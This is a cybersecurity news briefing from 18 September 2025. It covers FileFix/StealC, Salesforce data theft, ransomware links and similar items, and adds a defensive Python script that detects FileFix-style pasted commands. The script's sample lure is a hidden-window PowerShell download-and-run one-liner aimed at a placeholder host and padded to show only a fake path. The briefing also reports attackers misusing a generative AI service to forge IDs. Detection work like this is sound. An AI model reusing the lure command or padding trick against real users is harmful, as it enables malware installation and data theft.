Cyber Briefing: 2025.09.18
Apple patches CVE-2025-43300, FileFix drops StealC, Google removes 224 apps, Kimsuky fakes IDs, ShinyHunters hit Salesforce, Insight breach, ransomware links, Pompompurin jailed, Glilot raises $500M.
👉 What's happening in cybersecurity today?
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
🚨 Cyber Alerts
1. Apple Backports Fix For Exploited Bug
Apple has backported the fix for CVE-2025-43300, a recently disclosed vulnerability that has been exploited in the wild, to older but still supported operating system versions. Devices that cannot run the latest releases therefore also receive the patch, closing the gap attackers could otherwise use against users on earlier builds.
2. FileFix Uses Steganography To Drop StealC
A new social engineering campaign, called FileFix, impersonates Meta account warnings to deceive users. Victims are instructed to paste what looks like a harmless file path into the Windows File Explorer address bar; the pasted text is actually a PowerShell command, which Explorer runs, and the command installs the StealC infostealer.
3. Google Removes 224 Android Malware Apps
A large-scale Android ad fraud operation called "SlopAds" was shut down after 224 malicious apps on the Google Play Store generated 2.3 billion fraudulent ad requests daily. The apps were downloaded over 38 million times and used obfuscation and steganography to hide their malicious activity.
💥 Cyber Incidents
4. AI Forged Military IDs Used In Phishing
The North Korean hacking group Kimsuky used a generative AI service such as ChatGPT to produce images of fake South Korean military ID cards for a spear-phishing campaign. The forged credentials lent the lure credibility and helped the attackers trick victims into downloading malware designed to steal data and give the operators remote control of the victims' computers.
5. ShinyHunters Claims Salesforce Data Theft
The ShinyHunters extortion group claims to have stolen over 1.5 billion Salesforce records from 760 companies using OAuth tokens taken from the Salesloft Drift integration. The actors are using the stolen data to extort the affected companies and are mining it for credentials that could enable follow-on attacks.
6. Insight Partners Warns After Data Breach
Insight Partners, a New York-based venture capital firm, is notifying over 12,000 individuals about a data breach stemming from a ransomware attack. A "sophisticated social engineering attack" allowed hackers to access its network in October 2024 and encrypt servers in January 2025 after stealing sensitive personal, financial, and company data.
📢 Cyber News
7. Researchers Uncover Ransomware Links
Recent research finds that major ransomware groups are not isolated entities but part of an interconnected ecosystem: they share code, infrastructure and personnel, which makes attribution and tracking by traditional group-by-group methods considerably harder.
8. DOJ Resentences BreachForums Founder
Former BreachForums administrator, Conor Brian Fitzpatrick, has been resentenced to three years in prison for his role in running the cybercrime forum and possessing child sexual abuse material (CSAM), after his initial sentence of time served was vacated. Fitzpatrick, who went by the alias "Pompompurin," pleaded guilty to multiple charges and was required to forfeit over 100 domain names, electronic devices, and cryptocurrency.
9. Glilot Capital Raises 500 Million Fund
Israeli venture capital fund Glilot Capital has successfully raised $500 million, bringing its total assets under management to over $1 billion. This new capital will be used to support early-stage startups focused on cybersecurity, AI, and enterprise software.
📈Cyber Stocks
On Thursday, September 18, 2025, cybersecurity stocks moved in different directions as investors balanced inflation concerns, Federal Reserve policy uncertainty, and sector-specific developments. Some companies saw modest gains supported by product momentum, while others faced selling pressure tied to valuation and spending outlooks.
Cloudflare (NET) closed at $213.88, falling 2.44 percent as the stock retreated on concerns over margin compression and valuation following muted reactions to its forward guidance.
Rapid7 (RPD) finished at $19.50, slipping slightly as macroeconomic uncertainty raised caution about enterprise security spending despite recent signs of operational strength.
CrowdStrike (CRWD) ended at $445.50, holding near flat as investors looked ahead to its upcoming Investor Day while weighing competitive pressures in endpoint security.
SentinelOne (S) settled at $18.36, gaining modestly as optimism around its AI-driven XDR roadmap and product expansion helped offset concerns about margin pressure.
Okta (OKTA) closed at $90.00, trading flat as confidence from public sector contract wins and AI identity initiatives was balanced by worries over slowing enterprise demand in a weaker economy.
💡 Cyber Tip
🖼️ FileFix Uses Steganography to Drop StealC Infostealer
A new social engineering campaign, called FileFix, impersonates Meta account suspension warnings to trick victims into running malicious PowerShell commands. Instead of typing a command, users are told to paste what looks like a harmless file path into the Windows File Explorer address bar; the address bar accepts commands as well as paths, so the pasted text executes as PowerShell. The command then downloads an image that carries concealed scripts and payloads hidden via steganography, ultimately installing the StealC infostealer to steal sensitive data.
✅ What you should do
Never copy-paste commands or file paths from emails or web pages into File Explorer or PowerShell
Treat Meta account suspension messages with caution and verify them directly through official channels
Monitor clipboard activity and avoid executing anything you cannot fully verify
Use endpoint security tools that flag PowerShell abuse, in particular powershell.exe launched by explorer.exe with hidden-window, encoded or download arguments, since that parent/child chain is what an address-bar command produces
Report suspicious emails to your security team or provider
🔒 Why this matters
FileFix shows how attackers are evolving ClickFix-style social engineering: the command is hidden in clipboard content that looks like a file path, and the payload is hidden inside an image. Both steps avoid the file-based signatures traditional detection tools rely on and exploit human trust instead, making the technique a serious risk to both personal and business systems.
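As an added example (not code from the original briefing or from the researchers who documented FileFix), the Python script below turns the two defensive points above, and the address-bar trick described in item 2, into concrete checks. It assumes the lure is built as a PowerShell one-liner padded with whitespace and ended with a '#'-commented fake path, so that only the path is visible in the address bar; that layout comes from the public FileFix proof of concept, not from this page. The sample lure, sample path and Sysmon-style process events are constructed for illustration, and lure.example is a placeholder host.

```python
"""FileFix-style lure and process-chain checks (added example, not the
briefing's own code). Sample strings and events below are constructed."""
import re
from typing import Dict, List

# Interpreters that File Explorer's address bar will hand a pasted command to.
INTERPRETERS = {"powershell.exe", "powershell", "pwsh.exe", "pwsh",
                "cmd.exe", "cmd", "mshta.exe", "mshta"}
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
               "wscript.exe", "cscript.exe"}

# Argument patterns typical of download-and-run one-liners.
SUSPICIOUS = [(label, re.compile(pat, re.IGNORECASE)) for label, pat in (
    ("hidden window", r"-w(?:indowstyle)?\s+hidden"),
    ("encoded command", r"-e(?:c|nc|ncodedcommand)\b"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("web download", r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b"),
    ("base64 decode", r"frombase64string"),
    ("policy bypass", r"-nop\b|-ep\s+bypass|executionpolicy\s+bypass"),
)]

# The disguise (assumption from the public FileFix proof of concept, not from
# the briefing): a command padded with whitespace and ended with a '#'-commented
# fake path, so the address bar's visible text is just the path.
TRAILING_PATH = re.compile(r"\s{6,}#?\s*((?:[A-Za-z]:\\|\\\\)\S*)$")


def inspect_paste(text: str) -> Dict[str, object]:
    """Classify text about to be pasted into the address bar: allow/review/block."""
    stripped = text.strip()
    tokens = stripped.split()
    reasons: List[str] = []
    if not tokens:
        return {"verdict": "allow", "reasons": reasons, "shown_as": ""}
    first = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    is_interp = first in INTERPRETERS
    if is_interp:
        reasons.append(f"starts with interpreter {first}")
    for label, pat in SUSPICIOUS:
        if pat.search(stripped):
            reasons.append(f"argument looks like {label}")
    shown_as = stripped
    m = TRAILING_PATH.search(stripped)
    if m:
        shown_as = m.group(1)          # what the victim actually sees
        reasons.append("padded so only a trailing path is visible")
    if is_interp and len(reasons) > 1:
        verdict = "block"              # interpreter plus hide/download/padding tricks
    elif reasons:
        verdict = "review"             # e.g. an admin who simply typed 'powershell'
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons, "shown_as": shown_as}


def flag_process_events(events) -> List[Dict[str, object]]:
    """Flag Sysmon-style process-creation events where explorer.exe spawns a
    script host; an address-bar command always produces this parent/child pair."""
    hits = []
    for i, ev in enumerate(events):
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent != "explorer.exe" or image not in SHELL_HOSTS:
            continue
        result = inspect_paste(ev.get("cmdline", ""))
        verdict = "review" if result["verdict"] == "allow" else result["verdict"]
        hits.append({"index": i, "image": image, "verdict": verdict,
                     "reasons": [f"explorer.exe spawned {image}"] + result["reasons"]})
    return hits


# Constructed samples (lure.example is a placeholder host, not a real server).
LURE_COMMAND = 'powershell -w hidden -c "iex (iwr https://lure.example/warning.png).Content"'
LURE_VISIBLE_TAIL = r"# C:\company\internal-secure\filedrive\HRPolicy.docx"
SAMPLE_LURE = LURE_COMMAND + " " * 120 + LURE_VISIBLE_TAIL
SAMPLE_PATH = r"C:\Users\alice\Documents\Q3-report.docx"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "cmdline": f'"{PS_EXE}"'},                          # user typed 'powershell'
    {"parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "cmdline": f'"{PS_EXE}" ' + SAMPLE_LURE[len("powershell "):]},
    {"parent": r"C:\Users\alice\AppData\Local\Programs\Code.exe", "image": PS_EXE,
     "cmdline": f'"{PS_EXE}" -NoProfile'},               # not from explorer.exe
]

if __name__ == "__main__":
    for sample in (SAMPLE_PATH, SAMPLE_LURE):
        r = inspect_paste(sample)
        print(f"{r['verdict']:6} shown as {r['shown_as']!r}: {'; '.join(r['reasons'])}")
    for hit in flag_process_events(SAMPLE_EVENTS):
        print(f"event {hit['index']} {hit['verdict']}: {'; '.join(hit['reasons'])}")
```

The verdict split matters in practice: explorer.exe launching powershell.exe on its own is normal for administrators who type a shell name into the address bar, so that case is only "review", while an interpreter combined with a hidden window, a web download or the whitespace padding is what distinguishes the lure and earns "block". The `shown_as` field is the text a victim would have seen, which is useful in an alert so analysts understand why the user complied.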
📚 Cyber Book
Job Scammers (2022) by Antonio J Higgins and DT xyme
That concludes today's briefing.
Copyright © 2025 CyberMaterial. All Rights Reserved.